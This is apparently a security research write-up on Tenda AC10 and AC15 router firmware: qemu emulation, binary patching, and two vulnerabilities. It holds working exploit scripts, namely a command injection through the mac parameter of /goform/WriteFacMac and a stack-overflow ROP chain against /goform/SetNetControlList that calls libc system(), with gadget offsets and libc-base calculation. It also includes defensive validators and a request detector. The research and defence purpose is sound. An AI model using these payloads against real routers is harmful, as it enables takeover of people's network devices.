AIS3 2024 - Project Research Results

AIS3/ Web/ Pwn/ router 2024-08-05

Author: 堇姬Naup

Project

I was in track A2 (Web, IoT and Software Security).
My project was on IoT vulnerabilities: I studied Tenda routers, models AC10 and AC15, and tried to go from reproducing a known CVE to digging out a vulnerability myself. I didn't win best project, but I learned a lot. The research is written up below.

AC10 CVE Reproduction

Extracting the firmware

binwalk -E US_AC10V1.0RTL_V15.03.06.23_multi_TD01.bin


The entropy plot shows no sign of encryption, so extract it directly:

binwalk -e US_AC10V1.0RTL_V15.03.06.23_multi_TD01.bin

Emulation

qemu-mipsel-static

sudo apt install lib32z1 qemu-user-static
sudo cp $(which qemu-mipsel-static) ./

First try emulating it as-is:

sudo chroot ./ ./qemu-mipsel-static ./bin/httpd


Trace into the string WeLoveLinux.
Analysing the code around it, there are a few places where it can get stuck:


apmib_init(), check_network(), ConnectCfm()

Each call is a jalr through $t9; $t9 is loaded from $v0, which holds the address of apmib_init (and of the other two functions at their call sites).

apmib_init


09 F8 20 03 -> 01 00 02 24

https://shell-storm.org/online/Online-Assembler-and-Disassembler/
(patched to li $v0, 1)

check_network


09 F8 20 03 -> 01 00 02 24

(patched to li $v0, 1)

ConnectCfm


09 F8 20 03 -> 01 00 02 24

(patched to li $v0, 1)

All three calls are patched out.


sudo chroot ./ ./qemu-mipsel-static ./bin/httpd_patch

It now starts and keeps running.


Network interface


ip -> g_lan_ip -> br0
httpd looks up the IP of br0 and listens on that interface's IP.
So we can create a br0 bridge interface and add the ens33 NIC to it; httpd then picks up the correct IP.

sudo apt install uml-utilities bridge-utils
sudo brctl addbr br0
sudo brctl addif br0 ens33
sudo ifconfig br0 up
sudo dhclient br0


Emulation succeeded.


Page not found

Point webroot at webroot_ro:

rm -rf webroot
sudo ln -s webroot_ro/ webroot

Vulnerability analysis

formDefineTendDa() -> /goform/WriteFacMac


The mac parameter is under the requester's control, and doSystemCmd executes its argument as a command, so this is a command injection.
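To make the bug class concrete, here is an added Python example (not firmware code and not the author's script) that puts the pattern behind doSystemCmd next to a validated, shell-free alternative. The `ifconfig br0 hw ether` command is a hypothetical stand-in; the page does not show which command doSystemCmd actually builds from mac.

```python
import re

# Exactly six colon-separated hex octets; anything else is rejected
MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}$")
# Characters a POSIX shell treats as control syntax
SHELL_META = re.compile(r"[;&|`$\n]")


def has_shell_metachars(value):
    """True if a shell would interpret part of `value` as control syntax."""
    return SHELL_META.search(value) is not None


def build_mac_command_unsafe(mac):
    """The pattern behind doSystemCmd: the request parameter is spliced
    into a command string that a shell parses. A ';' inside `mac` ends
    the intended command and starts a second, attacker-chosen one.
    ('ifconfig br0 hw ether' is a hypothetical stand-in command.)"""
    return "ifconfig br0 hw ether " + mac


def build_mac_command_safe(mac):
    """Hardened form: validate against the expected format first, then
    return an argv list for execve-style execution, so no shell is ever
    involved; a bad value raises instead of reaching any command."""
    if not MAC_RE.match(mac):
        raise ValueError("mac must be six hex octets like aa:bb:cc:dd:ee:ff")
    return ["ifconfig", "br0", "hw", "ether", mac.lower()]


if __name__ == "__main__":
    injected = ";echo pwned by NAUP > /webroot/naup.txt"  # the value used on this page
    print("unsafe command string:", build_mac_command_unsafe(injected))
    print("metacharacters present:", has_shell_metachars(injected))
    try:
        build_mac_command_safe(injected)
    except ValueError as err:
        print("safe builder rejected it:", err)
    print("safe argv:", build_mac_command_safe("00:11:22:33:44:55"))
```

The two builders differ in where the decision happens: the unsafe one lets the shell decide what the string means, the safe one decides before anything is executed and never hands the value to a parser that knows about `;`.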


pwned!!


The first request gets redirected, so the request is sent twice.

import requests

ip = "192.168.247.132"

url = 'http://{}/goform/WriteFacMac'.format(ip)

headers = {
    "Host": "{}".format(ip),
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:104.0)Gecko/20100101 Firefox/104.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.",
    'Cookie': 'password=aaa'
}

file_name = "naup.txt"
# mac goes straight into doSystemCmd; the leading ';' ends the original command
cmd = ';echo pwned by NAUP > /webroot/{}'.format(file_name)

payload = {'mac': cmd}
# the first request is redirected, so send it twice
response_get = requests.get(url, headers=headers, params=payload)
response_get = requests.get(url, headers=headers, params=payload)

AC15 Vulnerability Discovery

Emulation

For debugging, install gdb-multiarch.
Arch: arm
If binwalk -e throws errors, install this first:
https://github.com/devttys0/sasquatch

sudo apt install qemu-user-static
terry1234@ubuntu:~/AIS3_2024/Tenda_AC15/_US_AC15V1.0BR_V15.03.05.19_multi_TD01.bin.extracted/squashfs-root$ sudo cp $(which qemu-arm-static) ./

Note: qemu has to be copied to the right place.

sub_2E420 is main(); its startup banner is identical to AC10's. As I recall the AC10 binary has symbols, so the two can be compared side by side.
In IDA Pro, ALT+T searches for strings; once a string is found, follow its xrefs to identify the function. My guess is that AC10 and AC15 are written much the same.

Patching


First jump to where WeLoveLinux is printed and see where it gets stuck.


check network

check network -> infinite loop -> sleep


MOV R3, R0 (00 30 a0 e1) -> MOV R3, #1 (01 30 a0 e3)


Coming back to it, the call is patched out.


ConnectCfm

ConnectCfm -> crashes


MOV R3, R0 (00 30 a0 e1) -> MOV R3, #1 (01 30 a0 e3)
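The byte sequences used in both patching sections (AC10: MIPS `jalr $t9` -> `li $v0, 1`; AC15: ARM `MOV R3, R0` -> `MOV R3, #1`) can be derived from the instruction encodings instead of being looked up by hand. The following is an added Python example, not the author's tooling: it encodes the four instructions, and its patcher refuses to write unless the expected original bytes are found at the offset, so a wrong offset cannot silently corrupt the binary. The offset is assumed to be a file offset (not the virtual address IDA displays); the file names come from the page and the 16-byte stand-in image is constructed.

```python
import struct


def mips_jalr(rs, rd=31):
    # SPECIAL opcode (0) | rs | rt=0 | rd | shamt=0 | funct=9 (JALR)
    return (rs << 21) | (rd << 11) | 9


def mips_addiu(rt, rs, imm):
    # opcode 9 (ADDIU); `li $v0, 1` assembles to addiu $v0, $zero, 1
    return (9 << 26) | (rs << 21) | (rt << 16) | (imm & 0xFFFF)


def arm_mov_reg(rd, rm, cond=0xE):
    # ARM data-processing MOV (opcode 0b1101), register operand, S=0, cond=AL
    return (cond << 28) | (0xD << 21) | (rd << 12) | rm


def arm_mov_imm(rd, imm8, cond=0xE):
    # Same MOV with the I bit set and rotate 0: an 8-bit immediate
    return (cond << 28) | (1 << 25) | (0xD << 21) | (rd << 12) | imm8


def le32(word):
    # Both targets here are little-endian, which is the byte order the hex view shows
    return struct.pack("<I", word)


MIPS_T9, MIPS_V0, MIPS_ZERO = 25, 2, 0
ARM_R0, ARM_R3 = 0, 3

MIPS_ORIG = le32(mips_jalr(MIPS_T9))                   # 09 f8 20 03
MIPS_PATCH = le32(mips_addiu(MIPS_V0, MIPS_ZERO, 1))   # 01 00 02 24
ARM_ORIG = le32(arm_mov_reg(ARM_R3, ARM_R0))           # 00 30 a0 e1
ARM_PATCH = le32(arm_mov_imm(ARM_R3, 1))               # 01 30 a0 e3


def patch_bytes(image, offset, expected, replacement):
    """Return a patched copy of `image`; raise if the bytes at `offset`
    are not `expected`, so nothing is written at a mistaken offset."""
    if len(expected) != len(replacement):
        raise ValueError("replacement must have the same length as the original")
    found = image[offset:offset + len(expected)]
    if found != expected:
        raise ValueError(f"at 0x{offset:x}: expected {expected.hex()}, found {found.hex()}")
    return image[:offset] + replacement + image[offset + len(replacement):]


def patch_file(src, dst, offset, expected, replacement):
    """Read src, apply one checked patch, write dst (src is left untouched)."""
    with open(src, "rb") as f:
        data = f.read()
    patched = patch_bytes(data, offset, expected, replacement)
    with open(dst, "wb") as f:
        f.write(patched)
    return patched


if __name__ == "__main__":
    # Constructed stand-in for a code region; with a real binary it would be
    # patch_file("bin/httpd", "bin/httpd_patch", FILE_OFFSET, MIPS_ORIG, MIPS_PATCH)
    fake_image = b"\x00" * 4 + MIPS_ORIG + b"\x00" * 8
    print(patch_bytes(fake_image, 4, MIPS_ORIG, MIPS_PATCH).hex())
```

Run `patch_file` once per call site with the offsets found in the disassembler; because every patch is checked against the original bytes, applying the MIPS patch to the ARM binary (or vice versa) fails loudly instead of producing a binary that crashes somewhere else.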


Network interface

The output above shows that the IP it picked up is wrong.

Trace into it:


ip -> g_lan_ip -> br0
httpd looks up the IP of br0 and listens on that interface's IP.
So, as with the AC10, we create a br0 bridge interface and add the ens33 NIC to it; httpd then picks up the correct IP.

sudo apt install uml-utilities bridge-utils
sudo brctl addbr br0
sudo brctl addif br0 ens33
sudo ifconfig br0 up
sudo dhclient br0


rm -rf webroot
sudo ln -s webroot_ro/ webroot


sudo chroot ./ ./qemu ./bin/httpd_patch

gdb

sudo chroot ./ ./qemu -g 30000 ./bin/httpd_patch
gdb-multiarch ./bin/httpd_patch
# inside gdb:
target remote :30000
c   # the process starts running


Attack


readelf -a ./lib/libc.so.0 | grep "system"
ROPgadget -a ./lib/libc.so.0

Gadget addresses (offsets within libc):
libc system offset 0x0005a270
pop {r3, pc} 0x00018298
mov r0, sp ; blx r3 0x00040cb8

sub_2E9EC() -> /goform -> the handler definitions are below; trace into them


/SetNetControlList (it pays to focus on handlers whose names start with Set and the like, since they are the ones most likely to accept input you can interact with)


Trace into it:


The list parameter is passed in -> the data flows into sub_7DD20 -> which reaches

strcpy


Tracing upward, dest is a fixed-size buffer at rbp-0x260, and strcpy copies list into it unbounded, so there is a stack buffer overflow.
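From the defender's side, both handlers analysed on this page have request shapes that stand out in traffic. As an added example (not the author's code), the checker below inspects constructed request records for the two signals that matter here: a mac value carrying shell metacharacters or not shaped like a MAC address, and a list value at least as long as the 0x260-byte stack buffer or containing non-printable bytes. The sample records are constructed for the example, not real captures.

```python
import re
from urllib.parse import urlsplit, parse_qs

LIST_BUF_SIZE = 0x260          # size of the fixed stack buffer found above
MAC_RE = re.compile(r"[0-9A-Fa-f]{2}(:[0-9A-Fa-f]{2}){5}")
SHELL_META = re.compile(r"[;&|`$\n]")


def inspect_request(target, body=""):
    """Return a list of human-readable findings for one HTTP request.
    `target` is the request-line path plus query; `body` is a form body."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    if body:
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)

    findings = []
    if parts.path == "/goform/WriteFacMac":
        for mac in params.get("mac", []):
            if SHELL_META.search(mac):
                findings.append("WriteFacMac: shell metacharacter in mac")
            elif not MAC_RE.fullmatch(mac):
                findings.append("WriteFacMac: mac is not a MAC address")
    if parts.path == "/goform/SetNetControlList":
        for lst in params.get("list", []):
            if len(lst) >= LIST_BUF_SIZE:
                findings.append(
                    f"SetNetControlList: list is {len(lst)} bytes, buffer is {LIST_BUF_SIZE}")
            if any(not (0x20 <= ord(ch) < 0x7F) for ch in lst):
                findings.append("SetNetControlList: non-printable bytes in list")
    return findings


# Constructed sample requests (target, body); the addresses and payloads are made up
SAMPLES = [
    ("/goform/WriteFacMac?mac=00:11:22:33:44:55", ""),
    ("/goform/WriteFacMac?mac=%3Becho+x+%3E+/webroot/x.txt", ""),
    ("/goform/SetNetControlList", "list=" + "a" * 0x260 + "%98%82%d9%3f"),
    ("/goform/SetNetControlList", "list=192.168.0.10"),
]


def scan(samples=SAMPLES):
    """Map sample index -> findings, for samples that produced any."""
    results = {}
    for index, sample in enumerate(samples):
        findings = inspect_request(*sample)
        if findings:
            results[index] = findings
    return results


if __name__ == "__main__":
    for index, findings in scan().items():
        print(index, SAMPLES[index][0], findings)
```

The length threshold is the one piece of knowledge the reverse engineering supplied; without it, a generic rule would have to guess. Percent-decoding is done before the checks so that URL-encoded `;` and raw bytes are seen the way the handler sees them.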


gdb-multiarch ./bin/httpd_patch
target remote :30000
b *0x5AD3C
c

Exploitation

Stack layout after the overflow, from the saved return address upward:

pop {r3, pc}
system address
mov r0, sp ; blx r3
cmd

After the pop:
r3 -> system
pc (the ARM counterpart of rip) -> address of the mov r0, sp ; blx r3 gadget
Execution continues at pc, i.e. at the gadget
mov r0, sp ; blx r3

At that point sp (like rsp, the top of the stack) points at cmd, which is moved into r0;
blx r3 then jumps into system.

get shell

Leaking libc

First, vmmap is not available under qemu, so another way of finding libc is needed.
Also, under qemu the libc base is the same on every run.

I thought about what to do on real hardware. After some research: in this situation, unlike a CTF, the device typically reboots after a crash with the same libc base as before, so brute-forcing the libc base is a viable approach; alternatively, another information-leak bug can be used to leak libc.


There is a call to puts here; let it run first so the GOT holds puts's libc address, then inspect it:

b *0x0002E4FC   # set a breakpoint
c


puts address after ASLR (0x3fdd1cd4) - puts offset in libc (0x35cd4) = 0x3fd9c000 (libc base)
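The arithmetic above as a small function, added here as an example and not taken from the author's exploit: the symbol offsets are parsed from `readelf -s`-style output (constructed lines carrying the page's offsets 0x35cd4 for puts and 0x5a270 for system; the Num, Size and Ndx columns are made up), and the result is checked for page alignment, which catches a leak read from the wrong GOT slot or an offset taken from a different libc build.

```python
import re

PAGE = 0x1000

# Constructed lines in the shape of `readelf -s ./lib/libc.so.0` output.
# Only the two Value columns are real (they are the offsets quoted on this page).
READELF_SAMPLE = """\
   Num:    Value  Size Type    Bind   Vis      Ndx Name
   100: 00035cd4   100 FUNC    GLOBAL DEFAULT    7 puts
   200: 0005a270   200 FUNC    GLOBAL DEFAULT    7 system
"""

SYM_LINE = re.compile(
    r"\s*\d+:\s+(?P<value>[0-9a-fA-F]+)\s+\d+\s+\w+\s+\w+\s+\w+\s+\S+\s+(?P<name>\S+)")


def parse_symbol_offsets(readelf_output):
    """Map symbol name -> offset within the library, from readelf -s output."""
    offsets = {}
    for line in readelf_output.splitlines():
        match = SYM_LINE.match(line)
        if match:
            offsets[match.group("name")] = int(match.group("value"), 16)
    return offsets


def libc_base_from_leak(leaked_addr, symbol_offset):
    """base = runtime address of a symbol - that symbol's offset in the file.
    Shared libraries are mapped page-aligned, so a misaligned result means the
    leak and the offset do not belong to the same symbol or the same build."""
    base = leaked_addr - symbol_offset
    if base % PAGE:
        raise ValueError(f"0x{base:x} is not page-aligned; leak/offset mismatch")
    return base


def resolve(leaked_puts, readelf_output=READELF_SAMPLE):
    """Given the puts address read from the GOT, return libc base and system."""
    offsets = parse_symbol_offsets(readelf_output)
    base = libc_base_from_leak(leaked_puts, offsets["puts"])
    return {"base": base, "system": base + offsets["system"]}


if __name__ == "__main__":
    result = resolve(0x3fdd1cd4)   # the GOT value observed in gdb above
    print(f"libc base 0x{result['base']:x}, system 0x{result['system']:x}")
```

The alignment check is cheap insurance: with the firmware's libc the subtraction lands on 0x3fd9c000 exactly, and any offset from a mismatched library would almost certainly leave a non-zero low 12 bits.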


exploit

import requests
from pwn import p32   # only p32 is needed from pwntools

ip = "192.168.247.132"
url = "http://{}/goform/SetNetControlList".format(ip)

libc_base = 0x3fd9c000   # constant under qemu, see "Leaking libc" above

command = b"echo pwned by NAUP"

system_libc = libc_base + 0x5a270
mov_r0_sp_blx_r3 = libc_base + 0x40cb8
pop_r3_pc = libc_base + 0x18298

# 0x260 bytes fill the buffer up to the saved return address, then the chain:
# pop {r3, pc} -> r3 = system, pc = gadget; mov r0, sp ; blx r3 -> system(command)
payload = b'a'*0x260 + p32(pop_r3_pc) + p32(system_libc) + p32(mov_r0_sp_blx_r3) + command

cookie = {"Cookie": "password=naup"}
data = {"list": payload}

# as with the AC10, the first request is redirected, so send it twice
response = requests.post(url, cookies=cookie, data=data)
response = requests.post(url, cookies=cookie, data=data)

pwned


Slides

Here is the link to my slides:

https://www.canva.com/design/DAGMxyN3Vps/PEbWMzWHG4STGPuQHgkKdQ/edit?utm_content=DAGMxyN3Vps&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton